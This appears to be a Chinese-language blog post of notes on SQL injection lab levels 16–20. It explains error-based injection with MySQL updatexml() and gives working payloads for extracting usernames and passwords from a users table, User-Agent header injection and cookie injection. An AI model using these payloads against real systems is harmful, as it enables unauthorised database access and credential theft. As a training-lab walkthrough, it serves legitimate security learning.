<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>sql16~20 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="第16关 和上一关大体一致，不过漏洞为括号双引号包裹 Updatexml()函数“updatexml(XML_document,XPath_string,new_value);”即sql语句为“select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1”。 XML_document String格式，为XML文档对象的名称， DocXPath_st">
<meta property="og:type" content="article">
<meta property="og:title" content="sql16~20">
<meta property="og:url" content="http://example.com/2024/02/11/sql16-20/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="第16关 和上一关大体一致，不过漏洞为括号双引号包裹 Updatexml()函数“updatexml(XML_document,XPath_string,new_value);”即sql语句为“select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1”。 XML_document String格式，为XML文档对象的名称， DocXPath_st">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-02-10T16:20:08.000Z">
<meta property="article:modified_time" content="2024-02-10T16:22:18.254Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-sql16-20" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/02/11/sql16-20/" class="article-date">
  <time class="dt-published" datetime="2024-02-10T16:20:08.000Z" itemprop="datePublished">2024-02-11</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      sql16~20
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><strong>第16关</strong></p>
<p>和上一关大体一致，不过漏洞为括号双引号包裹</p>
<p>Updatexml()函数“updatexml(XML_document,XPath_string,new_value);”<br>即sql语句为“select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1”。</p>
<p>XML_document String格式，为XML文档对象的名称，</p>
<p>DocXPath_string Xpath格式的字符串</p>
<p>new_value String格式，替换查找到的符合条件的数据</p>
<p>报错注入原理：concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，爆出用户</p>
<p>0x7e，实为<del>，upadtexml()报错信息为特殊字符、字母及之后的内容，为了前面字母丢失，开头连接一个特殊字符</del>。</p>
<p><strong>第17关</strong></p>
<p>输入用户名密码，显示‘密码已重置’，之后随便输入一个用户名，会显示登陆失败</p>
<p>抓一下包，发现post的数据和之前一样</p>
<p>在username处没有报错，后续知道username处存在检查过滤</p>
<p>报错注入：查询语句 select updatexml(1,concat(0x7e,(语句)),1);</p>
<p>查询字段内容： 1’ and updatexml(1,concat(0x7e,(select group_concat(username,id,password) from users),0x7e),1) #</p>
<p>出现报错You can’t specify target table ‘users’ for update in FROM clause </p>
<p>这个错误的原因是在MySQL中，不允许直接在UPDATE语句的子查询中引用正在更新的目标表。 </p>
<p>在password处使用的是UPDATE，在MySQL中同一个语句不能先select表中内容再update表，因此这里可以用子查询的方式去替换 </p>
<p> 子查询是指在SQL语句中嵌套使用的查询语句。也就是说，在一个SQL查询中包含了另一个完整的查询语句作为子查询，用来提供额外的数据或过滤条件。 </p>
<p>1’ and updatexml(1,concat(0x7e,(select group_concat(username,id,password) from (select username,id,password from users)a),0x7e),1) #</p>
<p><strong>第18关</strong></p>
<p>打开第18关，输入正确密码，发现输出 Your User Agent </p>
<p>尝试了一下，发现uname和upass都存在过滤，使用头部注入</p>
<p>User Agent 在单引号中间，使用语句’ or updatexml(1,concat(0x7e,database(),0x7e),1) or ‘1’&#x3D;’1</p>
<p>‘ or updatexml(1,concat(0x7e,database(),0x7e),1) ，’ ‘,’ ‘)# 效果一样</p>
<p>在burp里面更改头部Your User Agent 部分，得到数据库信息</p>
<p><strong>第19关</strong></p>
<p>大体上和18关一样’ or updatexml(1,concat(0x7e,database(),0x7e),1) or ‘1’&#x3D;’1</p>
<p><strong>第20关</strong></p>
<p>输入用户名密码，出来一堆东西，发现关键词cookie</p>
<p>cookie注入</p>
<p>burp抓包发现Cookie: uname&#x3D;admin</p>
<p>使用工具在cookie后面加上’，发生报错，说明存在注入漏洞，底部存在回显点，直接注入即可</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/02/11/sql16-20/" data-id="clsne0yws0006cwb5g7gf93s8" data-title="sql16~20" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/02/12/xss1-3/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          xss1~3
        
      </div>
    </a>
  
  
    <a href="/2024/02/09/sql11-15/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">sql11~15</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/html-css-js%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/" rel="tag">html, css, js基础学习</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/html-css-js%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/" style="font-size: 10px;">html, css, js基础学习</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/02/">February 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/01/">January 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/02/15/upload/">upload</a>
          </li>
        
          <li>
            <a href="/2024/02/13/xss-11-13/">xss_11~13</a>
          </li>
        
          <li>
            <a href="/2024/02/13/xss-7-10/">xss_7~10</a>
          </li>
        
          <li>
            <a href="/2024/02/13/xss4-6/">xss4~6</a>
          </li>
        
          <li>
            <a href="/2024/02/12/xss1-3/">xss1~3</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>